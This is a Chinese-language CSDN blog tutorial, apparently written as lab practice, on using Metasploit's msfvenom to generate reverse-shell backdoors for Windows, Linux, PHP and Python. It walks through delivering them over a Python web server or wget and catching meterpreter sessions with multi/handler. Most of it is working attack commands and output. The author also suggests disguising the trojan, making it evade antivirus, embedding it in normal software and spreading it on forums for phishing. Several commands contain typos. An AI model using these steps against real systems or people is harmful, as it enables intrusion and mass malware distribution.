渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)

已于 2022-02-11 17:18:10 修改
阅读量7.3k 收藏 45
点赞数 7
分类专栏: Web安全|渗透测试 文章标签: 安全
于 2022-02-11 15:33:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51803729/article/details/122878092
版权

MsfVenom

        首先msf就是Metaaploit,venom就是病毒。msfvenom是msfpayload和msfencode的组合。将这两个工具集成在一个框架实例中。进一步来说,msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线。

Msfvenom使用

>生成后门

#msfvenom在bash shell里使用,不是msf终端,

        如果我们不清楚msfvenom到如何使用,可以输入msfvenom -h来查看帮助,msfvenom支持各种操作平台,各种脚本语言的木马的生成,在生成时需要你指定一种类型,比如说你要生成windows的,或者是Linux的,等等。

windows可执行程序后门:msfvenom-p windows/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Linux可执行程序后门:msfvenom-p linux/x64/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
php脚本后门: msfvenom -p php/meterpreter/reverse tcp LHOST =<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
python脚本后门:msfvenom-p python/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

有关命令的一些参数:

 在执行代码后我们查看一下生成的文件:

        那么生成完成木马后门了,我们如何传输,就是如何将生成的exe可执行文件发送给目标机器,这里我们有一个通用的方法,就是利用python快速开启一个web服务,python3 -m http.server


之后我们打开一个网页,输入192.168.164.130:8000/demo.exe就会弹出一个下载提示,点击下载就完成了我们的一个木马传输。

需要注意的是:一定要输入自己kali的IP地址,还有就是冒号后面的端口靠一定要和你所开启的端口号一致,像是上面我们默认的开启的8000,然而你也可以自己设置开启的端口号,在命令后面加上端口号就行。还有为什么后面是加上/demo.exe就可以发现文件,是因为我们生成的木马文件一般都自动保存在了home目录,如果是在其他目录下,只需要在文件前面加上你自己保存的路径即可。

或者你还可以利用其他传播方式,比如说你对这个后门进行了免杀,伪装,或者是注入嵌入到其他正常的软件,然后在社区论坛,贴吧上面进行广泛的传播。这些就是钓鱼的一个方式。

 >开启监听

>攻击机监听
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set Ihost 192.168.164.130
lhost =>192.168.123.159
msf6 exploit(multi/handler) > set lport 9999
lport => 9999
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.164.130:9999 

上面我们是成功完成了一个木马后门的生成和传输,但是我们对于这个9999端口的监听并没有打开,我们需要进入msf来进行监听。

进入msf以后我们需要使用一个模块,use exploit/multi/handler ,这个模块就是为了去开启一个监听端口,然后我们需要对模块进行设置,首先要设置payload为我们生成后门时使用的payload相同,set payload windows/x64/meterpreter/reverse_tcp,设置lhost,set lhost 192.168.164.130,设置lport,set lport 9999,设置完成后我们可以查看一下:可以看到是没有任何问题的。

run运行模块就可以开启监听了,然后我们转到靶机运行一下demo.exe,返回kali可以看到我们直接获取到了一个meterpreter会话,拿到了权限。

Msfvenom查看

上面我们是针对windows来生成了一个木马后面,但是有时候我们不一定知道我们要生成的都有那些参数,比如说我们要攻击Android,我不知道要生成什么样的可执行文件,甚至我压根不知道payload要选什么,我怎么知道这个payload有这么几个参数要设置呢?那我们什么都不知道的情况下该如何查看我们所需要的内容,这时候msfvenom可以使用命令来进行查看:

#查看msfvenom支持的格式:msfvenom -l formats
#查看msfvenom支持的攻击载荷:msfvenom -I payloads    针对win:msfvenom -l payloads |grep windows
#查看msfvenom支持的编码:msfvenom -l encoders
#查看payload的信息与设置:msfvenom -p cmd/windows/adduser --list-options 

>Linux

我们再来看一下对于Linux如何操作。其实和windows区别并不大

  1. msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.164.130 lport=8888 -f elf -o linux_demo.elf 
  2. use exploit/multi/handler
  3. set payload inux/x64/meterpreter/reverse_tcp,set lhost 192.168.164.130,set lport 8888
  4. run
  5. python3 -m http.server
  6. 转到Linux靶机,wget http://192.168.164.130:8000/linux_demo.elf
  7. 运行linux_demo.elf

综上所述我们得到了两个meterpreter,分别是windows的和linux的。

慵懒之龟
关注
  • 7
    点赞
  • 45
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
msf之msfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3699
msfvenom的使用
msfvenom生成木马的简单利用
xj28555的博客
08-10 5596
1、简介 本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10。 2、实验环境 1、一台kali虚拟机 ip为192.168.110.140 2、一台win10虚拟机 3、实验步骤 1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lpor.
Kali Linux渗透测试实战:Msfvenom木马生成与攻防实战教程
08-19
1、课程概要       本课程主要分享Kali Linux渗透测试实战:Msfvenom生成木马攻防实战教程! 2、课程目标         本课程致力于帮助广大学员掌握Msfvenom木马生成与攻防实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看学习! 4、特别说明        本课程支持一次购买,永久观看,请广大学员们放心选购!
Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透1 — 制作 windows 和 linux 客户端恶意软件进行渗透
最新发布
天下著书立传者,皆为我师
05-29 1001
通过制作含病毒和木马的恶意程序,利用msfvenom模块,完成靶机与msf相应的通信
MSF生成木马木马的简单使用
爱喝水的仙人树的博客
11-03 8826
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
msfvenom 基本使用
blackguest07的博客
03-05 1463
msfvenom 基础命令
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
`msfvenom`是Metasploit框架的一部分,是一个强大的工具,可以生成各种类型的恶意软件payload,用于渗透测试。以下是对`msfvenom`的详细解释以及如何使用它生成木马进行渗透测试。 首先,`msfvenom`允许测试者创建...
Metasploit渗透测试指南(全) .pdf
12-23
Metasploit渗透测试指南》是一本全面介绍Metasploit框架的权威书籍,它涵盖了从基础知识到高级技术的广泛内容,旨在帮助读者理解和掌握渗透测试的精髓。Metasploit是一款强大的安全工具,广泛用于安全研究、漏洞...
Metasploit渗透测试指南.修订版
09-12
Metasploit渗透测试指南》是一本专注于网络安全领域的重要书籍,尤其对于那些希望深入了解和运用Metasploit框架进行渗透测试的专业人士来说,它提供了一条深入理解与实践的路径。Metasploit是一款强大的开源安全...
Metasploit可执行后门.doc
12-01
Metasploit是一款开源的渗透测试框架,提供了一个功能强大且灵活的平台,用于渗透测试和漏洞利用。通过对Metasploit的深入研究和实践,我们可以更好地理解和防御黑客攻击。 1. Metasploit可执行后门的概念 ...
metasploit渗透测试平台.rar
08-18
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序...
Msfvenom使用指南
m0_57221101的博客
02-08 6076
参数总结 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) 2. –l 查看所有payload encoder nops。 3. –f (- -help-formats) 输出文件格式。 (- -help-form
msfvenom常见的使用命令
路baby的博客
06-24 2647
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线...
1.1 Metasploit 工具简介
热门推荐
CSDN
06-30 1万+
Metasploit 简称(MSF)是一款流行的开源渗透测试框架,由`Rapid7`公司开发,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。并且该框架还提供了一系列攻击模块和`Payload`工具,可用于漏洞利用、及漏洞攻击。同时软件自身支持多种操作系统平台,包括`Windows、Linux、MacOS`等。直到今天`Metasploit`已成为众多黑客手中渗透攻击的利器,并在安全领域大展身手。
msfvenom生成后台木马监听目标(windows渗透测试
forget_mt的博客
12-06 8157
针对windows操作系统的渗透测试 操作过程概况:利用msf生成一个后台木马,使用exploit/multi/handler模块,通过对方打开的形式获取权限,可以进入后渗透对目标进行监听等操作。 实战: 一:后台木马生成 注意在代码中LHOST:172.16.5.2与LPORT:4444 要根据实际情况来更改 LHOST设置为渗透机的ip LPORT设置为监听的端口,端口只要不是已经占用的就可以 msfvenom -a x86 --platform windows -p windows/m.
metasploitmsfvenom命令解释说明
WEL测试
08-29 6506
我使用的版本如下图所示:v4.16.0-dev- 在这个版中,之前的msfpayload、msfencode命令被整合到msfvenom中。 在命令行执行命令:msfvenom -h可以查看msfvenom解释说明: 针对上面的信息进行解释如下: MsfVenom:是Metasploit的独立负荷(payload)生成器。同时也替代了命令msfpayload、msfenco
熟悉msfvenom生成木马程序过程,并执行和监听控制.
suixinxxx的博客
11-04 3343
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 二,工具:MSF 三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 四,过程: 1,查看帮助 命令: root# msfvenom -h 结果: 2,生成
metasploit渗透测试笔记(内网渗透篇)
baidu_22850205的专栏
11-02 968
0x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行。本地监听即可获得meterpreter shell。 reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload wi
msfvenom生成安卓后门
09-10
msfvenomMetasploit框架的一个工具,用于生成恶意软件,包括后门。在使用msfvenom生成安卓后门时,我们需要首先了解一些基本概念和步骤。 首先,我们需要安装和设置Metasploit框架。然后,我们可以使用msfvenom命令创建后门。该命令的基本语法如下: msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地主机IP地址> LPORT=<本地主机端口> -o <输出文件路径> 这里的LHOST标识我们的本地主机IP地址,LPORT标识本地主机的端口号,-o表示输出文件路径。我们可以根据自己的需要进行调整。 生成后,我们可以将后门APK文件传输到目标安卓设备上,然后通过欺骗用户或利用其他手段将后门应用程序执行。一旦应用程序被执行,它会与我们在msfvenom中设置的本地主机IP地址和端口进行通信。 我们还可以进一步优化生成后门,例如: - 使用其他有效载荷,如android/meterpreter/reverse_http或android/meterpreter/reverse_https,以使用HTTP或HTTPS通信。 - 添加可执行权限,以确保安卓设备可以正确执行后门应用程序。 - 使用混淆技术来隐藏后门应用程序的真实目的,增加其对抗检测工具的能力。 总之,通过使用msfvenom工具,我们能够生成定制的安卓后门,用于安全测试和研究目的。然而,请注意在任何环境中合法和道德使用此类工具,并始终遵守法律和道德准则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

慵懒之龟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值